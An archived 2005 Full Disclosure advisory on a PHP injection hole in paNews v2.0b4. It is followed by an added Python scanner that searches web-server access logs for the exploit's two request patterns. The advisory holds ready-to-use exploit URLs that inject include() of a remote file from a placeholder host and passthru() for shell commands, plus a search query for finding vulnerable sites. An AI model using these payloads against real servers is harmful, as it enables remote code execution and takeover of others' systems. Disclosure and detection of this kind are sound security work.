Full Disclosure mailing list archives

paNews v2.0b4 - PHP Injection
From: tjomka <tjomka () navigator lv>
Date: Mon, 21 Feb 2005 07:16:47 +0200





oooo   oooo oooooooo8 ooooooooooo
 8888o  88 888        88  888  88 
 88 888o88  888oooooo     888     
 88   8888         888    888     
o88o    88 o88oooo888    o888o    
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: nst
* Date: 20.02.2005
********************************

web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4

PHP Injection
Bug works only if:
1. register_globals=On
2. folder "includes" is writable

p.s. please disable - javascripts =-]

Example 1

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)

then:

http://victim/panews/includes/config.php?nst=http://your/file.php


Example 2

http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

then:

http://victim/panews/includes/config.php?nst=id

Attachment: paNews_v2.0b4.txt

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
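
Detection for the two request shapes in the post above, run over web-server access logs. This is an added example, not part of the original post or of paNews; the log lines are constructed and the rule labels are names chosen here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = '''\
192.0.2.10 - - [21/Feb/2005:07:20:01 +0200] "GET /panews/index.php HTTP/1.1" 200 5120
192.0.2.44 - - [21/Feb/2005:07:21:13 +0200] "GET /panews/includes/admin_setup.php?access%5B%5D=admins&do=updatesets&showcopy=include%28%24nst%29 HTTP/1.1" 200 312
192.0.2.44 - - [21/Feb/2005:07:21:20 +0200] "GET /panews/includes/config.php?nst=id HTTP/1.1" 200 0
198.51.100.7 - - [21/Feb/2005:07:30:02 +0200] "GET /panews/includes/config.php HTTP/1.1" 200 0
'''

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CODE_CHARS = re.compile(r'[$(]')  # "$var" or "func(" inside a submitted value

def classify(line):
    """Return the rule labels (names chosen for this example) a log line triggers."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    path = unquote(url.path).lower()
    # parse_qsl percent-decodes, so access%5B%5D is compared as access[]
    params = parse_qsl(url.query, keep_blank_values=True)
    names = {key.split('[')[0] for key, _ in params}
    hits = []
    if path.endswith('/includes/admin_setup.php'):
        hits.append('direct-admin-setup')
        if 'access' in names:
            hits.append('access-set-from-request')
        if any(CODE_CHARS.search(value) for _, value in params):
            hits.append('php-code-in-value')
    elif path.endswith('/includes/config.php') and params:
        hits.append('config-php-with-params')
    return hits

def scan(log_text):
    """Group hits by client address and flag the two-step sequence from the post."""
    by_client = {}
    for line in log_text.splitlines():
        hits = classify(line)
        if hits:
            by_client.setdefault(line.split()[0], []).extend(hits)
    report = {}
    for client, hits in by_client.items():
        first = hits.index('php-code-in-value') if 'php-code-in-value' in hits else None
        two_step = first is not None and 'config-php-with-params' in hits[first:]
        report[client] = {'hits': hits, 'two_step': two_step}
    return report
```

The two conditions the post lists are also the things to check on a host: register_globals=On and a writable "includes" folder.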
